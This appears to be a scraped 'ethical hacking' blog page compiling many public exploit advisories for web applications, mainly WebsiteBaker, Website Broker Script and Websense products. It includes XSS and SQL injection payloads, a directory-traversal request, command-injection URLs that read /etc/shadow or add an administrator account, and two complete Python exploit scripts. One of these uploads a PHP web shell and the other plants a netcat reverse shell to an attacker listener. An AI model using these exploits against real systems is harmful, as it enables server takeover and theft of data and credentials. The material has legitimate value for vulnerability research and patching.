# Exploit Title: WebSocket Live Chat - Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Alireza Norkazemi
# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1
# POC :
1) Create your account and click setting icon and go to profile
2) Put this payload into Status box :
<script>alert('xss')</script>
3) The payload will be executed if someone opens your profile
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863590658
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/54346/info
WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
WebsitePanel versions prior to 1.2.2.1 are vulnerable.
https://www.example.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>
https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe>
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account
2. go to media
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. go to svg file (http://localhost/media/malas.svg)
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs: Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
=======================================
arbitary directory deleting
GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 02.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the page can do this
payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
POST /admin/pages/add.php HTTP/1.1
Host: localhost
Content-Length: 137
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9
Connection: close
b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add
2. Visit http://localhost/
# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 18-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://websitebaker.org/
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.13.0
# Category: Webapps
# Tested on: Linux/Windows
# WebsiteBaker Open Source Content Management
# Includes an endpoint that allows remote access
# Language page misconfigured, causing vulnerability
# User information with sufficient permissions is required.
# I had to write a long script to bypass some security measures.
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
def main():
parser = argparse.ArgumentParser(
description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
)
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
sleep(2)
find_default(args)
def find_default(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print("[-] Address not reachable!\n")
sleep(2)
exit(1)
exploit(args)
url = args.host + "/admin/login/index.php"
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/addons/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers)
for cookie in response.cookies:
phpsessid_name = cookie.name
soup = BeautifulSoup(response.text, 'html.parser')
input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value"))
input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value"))
input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name"))
input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value"))
login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)
def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):
session = requests.session()
url = args.host + "/admin/login/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}"
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/login/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
}
data = {
"url": '',
"username_fieldname": input_hidden_username,
"password_fieldname": input_hidden_password,
input_hidden_name: input_hidden_value,
input_hidden_username : args.login,
input_hidden_password : args.password,
"submit": ''
}
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
new_cookie = (response.cookies.get(phpsessid_name))
if response.headers.get("Location") == args.host + "/admin/start/index.php":
print("[+] Success Login...\n")
sleep(2)
check_pers(args, phpsessid_name, new_cookie)
else:
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)
def check_pers(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')
if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"):
find_token(args, phpsessid_name, new_cookie)
else:
print("[!] Unauthorized user!\n\n")
print("Requires user with language editing permissions.")
sleep(2)
exit(1)
def find_token(args, phpsessid_name, new_cookie):
url = args.host + "/admin/languages/index.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name : new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)
soup = BeautifulSoup(response.text, 'html.parser')
token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")
if soup.find_all("option")[1].text == "":
exploit(args)
elif soup.find_all("option")[20].text == "Türkçe":
token_lang = soup.find_all("option")[20].get("value")
uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
else:
install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
pass
def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
url = args.host + "/admin/languages/install.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
print("[!] Installing Vuln Lang File!\n")
sleep(2)
find_token(args, phpsessid_name, new_cookie)
def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):
url = args.host + "/admin/languages/uninstall.php"
cookies = {
"klaro": "{'klaro':true,'mathCaptcha':true}",
phpsessid_name: new_cookie
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/admin/languages/index.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"action": "uninstall",
"advanced": '',
token_hidden_name : token_hidden_value,
"file": token_lang,
"submit": "Uninstall"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'html.parser')
print("[!] Uninstall Lang File!\n")
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
sleep(2)
find_token(args, phpsessid_name, new_cookie)
def exploit(args):
response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
if response.status_code == 200:
print("[*] Exploit File Exists!\n")
sleep(2)
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + "/languages/TR.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()
# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
# Date: 2020-07-04
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://websitebaker.org/pages/en/home.php
# Software Link: https://wiki.websitebaker.org/doku.php/downloads
# Version: 2.12.2
# Tested on: Windows 10 and Ubuntu 18.04
# Note : You start listener before execute (e.g netcat) then procide listener ip and port
import requests
import re
from bs4 import BeautifulSoup
import sys
import getopt
options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])
for opt, arg in options:
if opt in ('-h'):
print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
exit()
elif opt in ('-t'):
main_url = arg
elif opt in ('-u'):
usr = arg
elif opt in ('-p'):
passwd = arg
elif opt in ('-i', '--lhost'):
lhost = arg
elif opt in ('-l' , '--lport'):
lport = arg
reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
shell_code_eval = "echo system('"+ reverse_shell_code + "');"
print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS
url = main_url+"/admin/login/index.php"
req = requests.get(url)
login_page = req.text
soup = BeautifulSoup(login_page, 'html.parser')
username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']
#LOGIN TO GET SESSIoN_COOKIE
login_page = requests.Session()
burp0_url = main_url+"/admin/login/index.php"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr, password_par : passwd, "submit": ''}
r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)
cok = r.headers['Set-Cookie']
cok = cok.split(' ')[0]
cookie_par = cok.split('=')[0]
cookie_val = cok.split('=')[1].replace(';','')
session_cookie = cookie_par + "=" + cookie_val
##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
create_page = req.text
soup = BeautifulSoup(create_page, 'html.parser')
weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']
##Create Code Page to Put Shell Code
create_page = requests.session()
burp0_url = main_url+"/admin/pages/add.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
##FIND THE PAGE ID
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
find_id = req.text
soup = BeautifulSoup(find_id, 'html.parser')
pageid = soup.find_all('option',string='exploit-shell')[0]['value']
##HTML PARSE TO PUT SHELL CODE
url = main_url+'/admin/pages/modify.php?page_id='+pageid
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
add_shellcode = req.text
soup = BeautifulSoup(add_shellcode, 'html.parser')
weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']
##ADD SHELL CODE
session = requests.session()
burp0_url = main_url+"/modules/code/save.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)
# Exploit Title: WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)
# Google Dork: -
# Date: 2020-09-20
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://websitebaker.org
# Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.12.2
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-25990
1. Description:
----------------------
WebsiteBaker 2.12.2 allows SQL Injection via parameter 'display_name' in /websitebaker/admin/preferences/save.php.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from /websitebaker/admin/preferences/save.php and save it like burp.req
Then run SQLmap to extract the data from the database:
sqlmap -r burp.req --risk=3 --level=5 --dbs --random-agent
3. Example payload:
----------------------
display_name=Administrator" AND (SELECT 9637 FROM (SELECT(SLEEP(5)))ExGN)-- Cspz&language=EN&timezone=system_default&date_format=M d Y&time_format=g:i A&email=admin@example.com&new_password_1=&new_password_2=¤t_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw
4. Burpsuite request:
----------------------
POST /websitebaker/admin/preferences/save.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/websitebaker/admin/preferences/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Connection: close
Cookie: wb-8123-sid=otfjsmqu8vljs9737crkcm8nec
Upgrade-Insecure-Requests: 1
display_name=Administrator&language=EN&timezone=system_default&date_format=M+d+Y&time_format=g%3Ai+A&email=admin%40example.com&new_password_1=&new_password_2=¤t_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw
# # # # #
# Exploit Title: Website Broker Script v3.02 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/website-broker-script/
# Demo: http://www.officialwebsiteforsale.com/official/
# Version: 3.02
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/website_details_view.php?view=[SQL]
# For example;
# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+-
# admin_login :id
# admin_login :userid
# admin_login :password
# admin_users :user_id
# admin_users :username
# admin_users :password
# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+-
# Etc...
# # # # #
# # # # #
# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
# Demo: http://www.officialwebsiteforsale.com/official/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15992
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/status_list.php?status_id=[SQL]
#
# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
#
# Parameter: status_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 5 columns
# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
#
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/47332/info
Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Website Baker 2.8.1 is vulnerable; other versions may also be affected.
POST /admin/users/add.php HTTP/1.1
user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add
POST /admin/groups/add.php HTTP/1.1
advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add
# # # # #
# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://flippa-clone.com/
# Software Link: https://flippa-clone.com/
# Demo: https://demo.flippa-clone.com/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/search.php?cat_id=[SQL]
#
# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
#
# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- -
#
# # # # #
source: https://www.securityfocus.com/bid/55194/info
Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><img%20src%3Dhttp%3A%2f%2fwww.evilanother.com%2fimages%2fcross_site.jpg>
https://www.example.com:8081/monitor/m_overview.ink?mode=0&menu=</script><meta%20http-equiv%3D%22refresh%22%20content%3D%220%3BURL%3Dhttps%3A%2f%2fwww.evil.com%2ftrojan.exe%22>
Abstract
A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Tested versions
This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well.
Fix
Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions
This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
Introduction
Websense Data Security Suite contains three modules - Data Security Gateway, Data Discover, and Data Endpoint - that can help manage the risk of losing your data to malicious users or accidental misuse.
The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Details
The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root).
With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
The following proof of concept will return the contents of /etc/shadow on affected appliances:
https://host:9447/appmng/servlet/CommandLineServlet?type=exec&uuid=asdfasdf&module=na1&command=ping&Destination=127.0.0.1'|cat%20/etc/shadow'
Other attack scenarios are also possible, like creating a backdoor account on the appliance.
source: https://www.securityfocus.com/bid/51086/info
Websense Triton is prone to a remote command-execution vulnerability.
An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
source: https://www.securityfocus.com/bid/51087/info
Multiple Websense products are prone to an authentication-bypass vulnerability.
Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
The following Websense products are affected:
Websense Web Security Gateway Anywhere 7.6
Websense Web Security Gateway 7.6
Websense Web Security 7.6
Websense Web Filter 7.6
https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def
source: https://www.securityfocus.com/bid/51085/info
Websense Triton is prone to a cross-site scripting vulnerability.
